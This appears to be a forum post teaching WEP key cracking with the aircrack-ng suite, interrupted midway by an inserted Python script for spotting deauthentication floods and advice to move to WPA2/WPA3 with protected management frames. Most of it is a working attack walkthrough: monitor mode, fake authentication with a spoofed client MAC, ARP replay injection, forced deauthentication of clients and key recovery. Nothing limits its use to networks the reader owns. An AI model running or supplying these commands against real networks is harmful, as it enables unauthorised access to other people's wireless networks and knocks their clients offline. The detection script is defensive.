OK, so I said I wasn't going to write a tutorial, but after helping someone out last night through PMs I thought it would be easier if I did. However, I will only show you the method of cracking; I won't tell you how to get in silently and do anything. This will also only cover WEP and not WPA-TKIP, even though they are the same method with slight changes to the commands. It will only give you the way to do it using one wireless NIC/dongle/phone/etc. and a select set of commands that will get you there if you have patience. There are many more commands and variations; I have used 2 or 3 NICs at the same time and got things cracked in about 5 mins, but that's an advanced way to do things so I'll keep it simple.
OK, so firstly there are a few prerequisites.
1. Have a means of using wireless; it would be pointless without one. This can be anything: a laptop, next would be a wireless dongle, then some phones which you can root (generally iPhones; Android phones I haven't tried yet) will work but won't support injection (I will explain this later).
2. Have a Linux distro; if you don't have one, get one. The easiest to work with is Ubuntu. You can burn the distro to disc and create a live CD, but every time you boot you'll have to reinstall everything, or you can put it onto a USB stick using a USB installer program [link removed]. Or you can just install to the HDD.
OK, so now that is all set up we need to boot into our new Linux, hit Alt+F2 and type
sudo apt-get update && sudo apt-get install aircrack-ng
and tick the "run in terminal" box.
Once this is done we will see if your wireless card is supported by this suite, so open up a terminal (Alt+F2, then gnome-terminal).
1. sudo airmon-ng
this lists your wireless interfaces (e.g. wlan0); then sudo airmon-ng start wlan0 will set your card into monitoring mode and create the mon0 interface used in the rest of the commands
2. sudo airodump-ng --write (nameofyourfile) mon0
this should start to show the networks that your card can see, capture data packets if there is any traffic, and list the connected wireless clients. The capture is saved as nameofyourfile-01.cap.
3. Once you have located an access point using WEP we need to see if it is using MAC filtering or not, so open up another terminal and type in the following
sudo aireplay-ng -1 0 -a [bssid of the AP] -b [bssid of the AP] -h [mac of the client] [interface]
so for me this would look something like
sudo aireplay-ng -1 0 -a 00:00:00:00:00:00 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0
and you will see
Sending authentication request
Authentication successful
Sending association request
Association successful
If we get "source MAC address rejected" then we will need to locate a client's MAC associated with the access point from the client list.
It is a good idea to go for an access point with a few clients for the next part anyway.
I'm assuming it was successful.
4. Packet injection is key, as this will help generate traffic and capture your data a lot faster. However, this will be the downfall for some, as it may not be supported by the device you're using because of its chipset. Find a client in the list from airodump.
Type in: sudo aireplay-ng -3 -a [bssid mac] -b [bssid mac] -h [client mac] -x 200 -r (whateverthenameofthefileisthatyounamedforAIRODUMP-01.cap) mon0
We then wait for it to start sending packets. If this doesn't seem to be doing anything after about 5 mins, you can use the following command in another terminal to get the AP and client to deauth each other and send ARP requests
sudo aireplay-ng --deauth 10 -a [bssid] -c [client mac] mon0
OK, so sit back and watch your airodump box; it should be capturing data packets now and, if done right, shouldn't take too long to get to 80k.
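The deauth step above is also the noisiest part of the procedure from the network owner's side: a burst of deauthentication frames that claim to come from the AP's own address. The script below is an added example, not code from the original post, showing how a wireless IDS or a log-review script can flag such a burst. It assumes a text log with one management frame per line in the form "<epoch_seconds> <frame_type> <source_mac> <dest_mac>" (a reshaped tshark export or WIDS log; that layout is an assumption), and the sample lines, MAC addresses, window and threshold are constructed for the demo.

```python
"""Flag 802.11 deauthentication floods in a frame log (added example)."""
from collections import defaultdict

# Constructed sample log: one normal beacon, then 12 deauth frames from the
# AP address to one client within ~0.1 s, then a single deauth from another
# AP (normal client roaming) and its beacon. All MACs are placeholders.
SAMPLE_LOG = """\
1000.00 beacon 00:00:00:00:00:00 ff:ff:ff:ff:ff:ff
1000.10 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.11 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.12 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.13 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.14 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.15 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.16 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.17 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.18 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.19 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.20 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1000.21 deauth 00:00:00:00:00:00 11:11:11:11:11:11
1005.00 deauth 22:22:22:22:22:22 33:33:33:33:33:33
1006.00 beacon 22:22:22:22:22:22 ff:ff:ff:ff:ff:ff
"""


def parse_frames(text):
    """Parse log lines into (timestamp, type, src, dst) tuples; skip malformed lines."""
    frames = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, ftype, src, dst = parts
        frames.append((float(ts), ftype.lower(), src.lower(), dst.lower()))
    return frames


def deauth_floods(frames, window_s=10.0, threshold=8):
    """Return {(src, dst): peak_count} for address pairs whose deauth/disassoc
    frames exceed `threshold` inside any sliding window of `window_s` seconds.

    A single deauth is normal (a client leaving); a dense run of them from one
    AP address to one client is the signature of a forged deauth burst.
    """
    times_by_pair = defaultdict(list)
    for ts, ftype, src, dst in frames:
        if ftype in ("deauth", "disassoc"):
            times_by_pair[(src, dst)].append(ts)

    alerts = {}
    for pair, times in times_by_pair.items():
        times.sort()
        start = 0
        peak = 0
        # Two-pointer sliding window over sorted timestamps.
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[pair] = peak
    return alerts


if __name__ == "__main__":
    for (src, dst), count in deauth_floods(parse_frames(SAMPLE_LOG)).items():
        print(f"ALERT: {count} deauth frames from {src} to {dst} within 10 s")
```

Because the forged frames carry the AP's own address, the source MAC alone cannot separate attacker from AP; the rate is what gives it away. The durable fix is not detection but retiring WEP: under WPA2/WPA3 with Protected Management Frames (802.11w) a client discards deauth frames it cannot authenticate, which WEP has no way to offer.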
5. aircrack-ng: this is where your hard work will pay off. You can start this command at any time during the capturing process, as it will restart at a defined amount of packets, so you can set it and forget it.
In a terminal: sudo aircrack-ng (whateverthenameofyourfileis-01.cap)
Then pick your target access point by the number listed next to it. It will then proceed to tell you if it can find the key or if it needs more packets.
Once you have got the key, type in sudo airmon-ng stop mon0 and close your terminals after writing down the keys you have obtained.
Congratulations, you have cracked WEP. If it didn't work the first time, try again.
See, told you it was easy.
Please thank and rep; it took ages to write this.